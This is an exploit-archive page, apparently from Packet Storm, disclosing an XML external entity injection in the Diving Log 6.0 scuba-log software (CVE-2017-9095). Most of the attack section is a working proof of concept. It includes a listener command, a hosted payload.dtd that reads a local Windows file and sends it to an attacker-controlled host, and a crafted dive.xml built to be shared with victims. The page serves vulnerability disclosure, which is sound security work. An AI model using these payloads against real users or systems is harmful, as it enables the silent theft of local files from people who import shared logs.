what you don't know can hurt you

Diving Log 6.0 XML External Entity Injection

Diving Log 6.0 XML External Entity Injection
Posted Nov 27, 2017
Authored by Trent Gordon

Diving Log version 6.0 suffers from an XML external entity injection vulnerability.

tags | exploit, xxe
advisories | CVE-2017-9095
MD5 | 9d6c9f15cd8cdb7805839a5f1d6aa410

Diving Log 6.0 XML External Entity Injection

Change Mirror Download
[+] Exploit Title: Diving Log 6.0 XXE Injection
[+] Date: 27-11-2017
[+] Exploit Author: Trent Gordon
[+] Vendor Homepage: http://www.divinglog.de
[+] Software Link: http://www.divinglog.de/english/download/
[+] Disclosed at: https://thenopsled.com/divinglog.txt
[+] Version: 6.0
[+] Tested on: Windows 7 SP1, Windows 10
[+] CVE: CVE-2017-9095

==================
Background:
==================
Diving Log 6.0 is a scuba diving log software that manages and consolidates logs from other disparate sources. Many scuba diving log software programs export their data in an XML file.

==================
Vulnerability:
==================
By having a user import a crafted dive.xml file (very common, many divers share logs), it is possible to execute a XXE injection which retrieves local files and exfiltrates them to a remote attacker.
1.)Open Diving Log 6.0
2.)Close "Welcome Center" popup and select "Import" from the bottom left corner
3.)Select "Subsurface" from the list of import data types.
4.)"Open File" and select the crafted dive.xml file (with listener open on ATTACKERS-IP)

==================
Proof of Concept:
==================

a.) python -m SimpleHTTPServer 9999 (listening on ATTACKERS-IP and hosting payload.dtd)

b.) Hosted "payload.dtd"

<?xml version="1.0" encoding="utf-8" ?>
<!ENTITY % data SYSTEM "file:///c:/windows/system.ini">
<!ENTITY % param1 "<!ENTITY &#x25; exfil SYSTEM 'http://ATTACKERS-IP?%data;'>">


c.) Exploited "dive.xml"

<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % sp SYSTEM "http://ATTACKERS-IP/payload.dtd">
%sp;
%param1;
%exfil;
]>
<divelog program='subsurface' version='3'>
<settings>
</settings>
<divesites>
<site uuid='33a32a07' name='hacked'>
</site>
</divesites>
<dives>
<dive number='1' divesiteid='33a32a07' date='2017-05-15' time='14:49:10' duration='46:00 min'>
<notes></notes>
<cylinder size='11.1 l' workpressure='207.0 bar' description='unknown' />
<divecomputer model='manually added dive'>
<depth max='15.0 m' mean='13.37 m' />
<surface pressure='1.013 bar' />
<sample time='0:00 min' depth='0.0 m' />
<sample time='3:00 min' depth='15.0 m' />
<sample time='40:00 min' depth='15.0 m' />
<sample time='42:00 min' depth='5.0 m' />
<sample time='45:00 min' depth='5.0 m' />
<sample time='46:00 min' depth='0.0 m' />
</divecomputer>
</dive>
</dives>
</divelog>

==================
Additional Attack Vectors:
==================
I tested and exploited the "subsurface" import option, however MANY other dive log software programs use XML and most are available as Import options in Diving Log 6.0. This XXE injection vulnerability is most likely vulnerable in every import option that utilizes XML for the underlying custom file format(.UDCF and .UDDF, for example).

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

September 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    1 Files
  • 2
    Sep 2nd
    38 Files
  • 3
    Sep 3rd
    30 Files
  • 4
    Sep 4th
    15 Files
  • 5
    Sep 5th
    12 Files
  • 6
    Sep 6th
    17 Files
  • 7
    Sep 7th
    3 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    24 Files
  • 10
    Sep 10th
    22 Files
  • 11
    Sep 11th
    22 Files
  • 12
    Sep 12th
    15 Files
  • 13
    Sep 13th
    5 Files
  • 14
    Sep 14th
    2 Files
  • 15
    Sep 15th
    1 Files
  • 16
    Sep 16th
    11 Files
  • 17
    Sep 17th
    14 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close